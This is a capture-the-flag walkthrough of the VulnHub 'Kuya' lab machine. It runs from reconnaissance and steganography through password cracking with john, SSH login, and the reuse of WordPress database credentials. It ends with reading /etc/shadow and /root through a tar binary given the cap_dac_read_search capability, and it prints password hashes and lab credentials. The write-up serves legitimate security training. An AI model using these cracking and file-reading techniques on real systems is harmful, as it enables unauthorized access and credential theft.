BACK
root@kali:~#
root@kali:~/Documents/vulnhub/Kuya#
root@kali:~/Documents/vulnhub/Kuya#
root@kali:~/Documents/vulnhub/Kuya# 
root@kali:~/Documents/vulnhub/Kuya#
test@mini:~$
kuya@mini:/var/www/html/wordpress$
8 8888 ,88' 8 8888 88 `8.`8888. ,8' .8.
8 8888 ,88' 8 8888 88 `8.`8888. ,8' .888.
8 8888 ,88' 8 8888 88 `8.`8888. ,8' :88888.
8 8888 ,88' 8 8888 88 `8.`8888.,8' . `88888.
8 8888 ,88' 8 8888 88 `8.`88888' .8. `88888.
8 8888 88' 8 8888 88 `8. 8888 .8`8. `88888.
8 888888< 8 8888 88 `8 8888 .8' `8. `88888.
8 8888 `Y8. ` 8888 ,8P 8 8888 .8' `8. `88888.
8 8888 `Y8. 8888 ,d8P 8 8888 .888888888. `88888.
8 8888 `Y8. `Y88888P' 8 8888.8' `8. `88888.
Target IP: 10.0.2.17
by sc00by
##########
nmap scan:
##########
root@kali:~# nmap -p- -sT -sV 10.0.2.17
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-09 12:08 EDT
Nmap scan report for 10.0.2.17
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
MAC Address: 08:00:27:39:31:D7 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.82 seconds
###############
The web server:
###############
[~!~] I was greeted with a very simple page:
[~!~] Viewing the page source revealed the
location of the spongebob image:
/loot/image.jpeg
#########
The loot:
#########
[~!~] As there didn't seem to be many other
avenues to take from here, I decided
to run some steganalysis on the images
root@kali:~/Documents/vulnhub/Kuya# steghide extract -sf spongebob.jpeg
Enter passphrase:
the file "robots.txt" does already exist. overwrite ? (y/n) y
wrote extracted data to "robots.txt".
root@kali:~/Documents/vulnhub/Kuya# cat robots.txt
1.jpg
2."
3."
4."
5."
image.jpeg
[~!~] NOTE: I entered a blank password
[~!~] Here we see what looks like the sites
'robots.txt' file...interesting. Let's
see what the other images hold
root@kali:~/Documents/vulnhub/Kuya# steghide extract -sf 1.jpg
Enter passphrase:
wrote extracted data to "secret.txt".
root@kali:~/Documents/vulnhub/Kuya# steghide extract -sf 2.jpg
Enter passphrase:
wrote extracted data to "emb.txt".
root@kali:~/Documents/vulnhub/Kuya# steghide extract -sf 3.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
root@kali:~/Documents/vulnhub/Kuya# steghide extract -sf 4.jpg
Enter passphrase:
wrote extracted data to "loot.pcapng".
root@kali:~/Documents/vulnhub/Kuya#
[~!~] All but 3.jpg gave us some juicy
looking files:
1.jpg => secret.txt
2.jpg => emb.txt
3.jpg => ACTUALLY PASSWORD PROTECTED
4.jpg => loot.pcapng
###########
secret.txt:
###########
root@kali:~/Documents/vulnhub/Kuya# cat secret.txt
WW91IHJlYWxseSB0aG91Z2h0IGl0IHdvdWxkIGJlIHRoaXMgZWFzeSA/IEtlZXAgZGlnZ2luZyAhIExvdHMgb2YgdHJvbGxzIHRvIGRlZmVhdC4=
[~!~] Looks like some base64
root@kali:~/Documents/vulnhub/Kuya# cat secret.txt | base64 -d
You really thought it would be this easy ? Keep digging ! Lots of trolls to defeat.
[~!~] Lot's of trolls to defeat...
########
emb.txt:
########
root@kali:~/Documents/vulnhub/Kuya# cat emb.txt
+[--->++<]>+.++[->++++<]>+.+++++++..[++>---<]>--.++[->++<]>.[--->+<]>+++.-.---------.
--[--->+<]>-.+.-.--[->+++<]>-.[->+++++++<]>.++++++.---.[-->+++++<]>+++.+++[->++<]>.[-
->+++<]>.+++++++++.+.+.[---->+<]>+++.+++[->++<]>.--[--->+<]>.-----------.++++++.-[---
>+<]>--.-[--->++<]>-.++++++++++.+[---->+<]>+++.>+[--->++<]>.>-[----->+<]>-.++[->++<]>
..----.-[--->++<]>+.-.--[++++>---<]>.-------------.-[--->+<]>+++.+[-->+<]>+++++.+.++[
->+++++<]>.--.+[----->+<]>.--[++>---<]>.+[->++<]>.-[--->++<]>+.--.-[---->+++<]>-.
[~!~] It's...beautiful. This is actually a programming
language called... Brainfuck. I had to decode it
once before during the NCL Fall 2018 preseason.
Decoder: https://www.dcode.fr/brainfuck-language
Decoded:
Console
Well Done ! Your First Flag is V2hhdCBpcyBCYWx1dCA/
Memory: 17 => 32 ( ), 19 => 86 (V), 32 => 47 (/),
[~!~] We found one flag! woot woot
First flag:
V2hhdCBpcyBCYWx1dCA/
############
loot.pcapng:
############
root@kali:~/Documents/vulnhub/Kuya# wireshark loot.pcapng
[~!~] There were only about 10 packets captured in this
.pcapng. There was one interesting GET request that
I noticed:
[~!~] To export 'loot.7z' to our filesystem do the following:
File > Export Objects > HTTP > Save the file
[~!~] This was my first roadbump, it took me a while to find
the correct way to brute force the password. Finally
I found a john file for producing the 7zip hash:
root@kali:~/Documents/vulnhub/Kuya# perl 7z2john.pl loot.7z > loot.hash
root@kali:~/Documents/vulnhub/Kuya# file loot.hash
loot.hash: ASCII text, with very long lines
[~!~] Now I passed the hash stored in loot.hash to john:
root@kali:~/Documents/vulnhub/Kuya# john loot.hash
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip [SHA256 128/128 SSE2 4x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 0 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 1/3 (2019-04-09 16:11) 0g/s 10.78p/s 10.78c/s 10.78C/s loot.zloot5..loot.zz6
Warning: Only 2 candidates buffered for the current salt, minimum 8
needed for performance.
0g 0:00:03:14 1/3 (2019-04-09 16:14) 0g/s 7.429p/s 7.429c/s 7.429C/s Lloot.7z)..Loot*
Warning: Only 5 candidates buffered for the current salt, minimum 8
needed for performance.
0g 0:00:04:52 1/3 (2019-04-09 16:15) 0g/s 7.543p/s 7.543c/s 7.543C/s slloot..s7z
Warning: Only 4 candidates buffered for the current salt, minimum 8
needed for performance.
0g 0:00:12:27 1/3 (2019-04-09 16:23) 0g/s 7.963p/s 7.963c/s 7.963C/s Loot31..Loot.7z7z32
Almost done: Processing the remaining buffered candidate passwords, if any
Warning: Only 2 candidates buffered for the current salt, minimum 8
needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
manchester (loot.7z)
1g 0:00:20:57 DONE 2/3 (2019-04-09 16:32) 0.000795g/s 8.303p/s 8.303c/s 8.303C/s 147258369..mommy1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Documents/vulnhub/Kuya# john --show loot.hash
loot.7z:manchester
1 password hash cracked, 0 left
[~!~] Now to extract...
root@kali:~/Documents/vulnhub/Kuya# 7za x loot.7z
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i5 CPU 750 @ 2.67GHz (106E5),ASM)
Scanning the drive for archives:
1 file, 1976 bytes (2 KiB)
Extracting archive: loot.7z
--
Path = loot.7z
Type = 7z
Physical Size = 1976
Headers Size = 216
Method = LZMA2:12 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed):
Everything is Ok
Folders: 1
Files: 2
Size: 2157
Compressed: 1976
####################
WHAT'S IN THE FILES?
####################
root@kali:~/Documents/vulnhub/Kuya# cd loot
root@kali:~/Documents/vulnhub/Kuya/loot# ls
id_rsa id_rsa.pub
root@kali:~/Documents/vulnhub/Kuya/loot# file *
id_rsa: PEM RSA private key
id_rsa.pub: OpenSSH RSA public key
[~!~] OH HEY look at that, ssh keys!
root@kali:~/Documents/vulnhub/Kuya/loot# john id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8
needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8
needed for performance.
Warning: Only 2 candidates buffered for the current salt, minimum 8
needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8
needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
hello (id_rsa)
hello (id_rsa)
Proceeding with incremental:ASCII
hello (id_rsa)
3g 0:00:02:28 3/3 (2019-04-09 17:30) 0.02027g/s 1321Kp/s 1321Kc/s 1321KC/s gtc6az..gtc6bl
3g 0:00:10:25 3/3 (2019-04-09 17:38) 0.004793g/s 1360Kp/s 1360Kc/s 1360KC/s 10jon3n..10jo1bl
Session aborted
root@kali:~/Documents/vulnhub/Kuya/loot# john --show id_rsa.hash
id_rsa:hello
1 password hash cracked, 0 left
[~!~] What an easy id_rsa passphrase:
root@kali:~/Documents/vulnhub/Kuya/loot# 'hello'
ssh -i id_rsa test@mini
Enter passphrase for key 'id_rsa':
Linux mini 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 18 01:33:12 2018 from 192.168.37.1
test@mini:~$
###################
A Shell on the Box:
###################
test@mini:~$ cd .ssh
test@mini:~/.ssh$ ls
authorized_keys id_rsa id_rsa.pub sshscript.sh
test@mini:~/.ssh$ cat sshscript.sh
#!/bin/bash
echo "FInally you got a shell ! Here's a flag for you 5256247262. Let's see where you go from here"
test@mini:~/.ssh$
[~!~] Our second flag! It looks like a telephone number,
but, who knows?
Second flag:
5256247262
[~!~] Next after lots of digging I found my way to the
web server directory and found the following wordpress
config file:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'database_name_here');
/** MySQL database username */
define('DB_USER', /var/www/html/wordpress/wp-config-sample.php
'kuya'
);
/** MySQL database password */
define('DB_PASSWORD', 'Chrepia##@@!!'
);
/** MySQL hostname */
define('DB_HOST', 'localhost');
[~!~] Looks like we may have found some user creds?
test@mini:/var/www/html/wordpress$ su kuya
Password:
kuya@mini:/var/www/html/wordpress$ whoami
kuya
[~!~] Privesc #1
test -> kuya
#########################
Exploring Kuya, the user:
#########################
kuya@mini:/var/www/html/wordpress$ cd
kuya@mini:~$ ls
shadow.tar who_dis.txt
kuya@mini:~$ cat who_dis.txt
Well Done !
BTW this was too easy :D
Here is something for you IL0v3C@f3HaV@nA
kuya@mini:~$
[~!~] Our third flag!
Third flag:
IL0v3C@f3HaV@nA
###############
Digging Around:
###############
[~!~] This took me a good chunk of time, but i realize
now how important it is to check bash history
kuya@mini:~$ history
1 cd /home/kuya
2 chown -R kuya
3 chown -R kuya /home/kiya
4 chown -R kuya /home/kuya
5 su root
6 cd /home/kuya
7 cat /etc/shadow
8 ./tar -cvf shadow.tar /etc/shadow
9 tar -cvf shadow.tar /etc/shadow
10 which tar
11 getcap -r / 2>/dev/null
12 setcap cap_dac_read_search=ep
13 exit
[~!~] I had to do a bit of digging around with tar
options to truly understand what was going on
Reference: https://www.computerhope.com/unix/utar.htm
kuya@mini:~$ tar -cvf shadow.tar /etc/shadow
tar: Removing leading `/' from member names
/etc/shadow
[~!~] To be completely honest I don't quite understand what
happened here but the leading / was removed, making it
only:
etc/shadow
which should be accessible by us as the user kuya
kuya@mini:~$ tar xvf shadow.tar
etc/shadow
kuya@mini:~$ ls
etc
shadow.tar who_dis.txt
kuya@mini:~$ cat etc/shadow
root:$6$xmBqiwRc$UE1ERWQecpCHwNsyE4yhSYv8wMD1H1yvB4TCBZQaoZMuxioJ0c7xE/Q/WwiRK2Vdf2Y2KGeHCh4NHAq5L4JTg0:17863:0:99999:7:::
daemon:*:17863:0:99999:7:::
bin:*:17863:0:99999:7:::
sys:*:17863:0:99999:7:::
sync:*:17863:0:99999:7:::
games:*:17863:0:99999:7:::
man:*:17863:0:99999:7:::
lp:*:17863:0:99999:7:::
mail:*:17863:0:99999:7:::
news:*:17863:0:99999:7:::
uucp:*:17863:0:99999:7:::
proxy:*:17863:0:99999:7:::
www-data:*:17863:0:99999:7:::
backup:*:17863:0:99999:7:::
list:*:17863:0:99999:7:::
irc:*:17863:0:99999:7:::
gnats:*:17863:0:99999:7:::
nobody:*:17863:0:99999:7:::
systemd-timesync:*:17863:0:99999:7:::
systemd-network:*:17863:0:99999:7:::
systemd-resolve:*:17863:0:99999:7:::
systemd-bus-proxy:*:17863:0:99999:7:::
_apt:*:17863:0:99999:7:::
messagebus:*:17863:0:99999:7:::
sshd:*:17863:0:99999:7:::
kuya:$6$MpPRKfei$KvGUeoeKXHNg8iSzMHPST4vtIe3GbjAHAf2gtJijQciwLtaeBNMi0pHjx1BSetZB/au8x.yKF9SB.nLtW3WRT.:17863:0:99999:7:::
test:!:17865:0:99999:7:::
mysql:!:17867:0:99999:7:::
[~!~] If we can access any file we want with this
perhaps we can snag any other location / file
we want?
kuya@mini:~$ tar cvf shadow.tar /root
tar: Removing leading `/' from member names
/root/
/root/.nano/
/root/M3m3L0rd.txt
/root/.selected_editor
/root/.bash_history
kuya@mini:~$ tar xvf shadow.tar
root/
root/.nano/
root/M3m3L0rd.txt
root/.selected_editor
root/.bash_history
kuya@mini:~$ ls
etc root
shadow.tar who_dis.txt
[~!~] The root directory!
kuya@mini:~$ cd root
kuya@mini:~/root$ ls
M3m3L0rd.txt
kuya@mini:~/root$ cat M3m3L0rd.txt
You did it !!!!
COngratulations :D
I just hope you had the same fun as I had while making this box.
As this is my first box, please send in your reviews to me on syed.ashhad72@gmail.com (DOn't hack this please Mr Leet)
If you are still reading, you are wasting your time
THere is no flag here.
Seriously Stop
Well I can't help so here is the last one WeasleyIsOurKing
#PeaceOut
kuya@mini:~/root$
[~!~] THAT'S A WIN!
Final flag:
-sc00by
BACK
WeasleyIsOurKing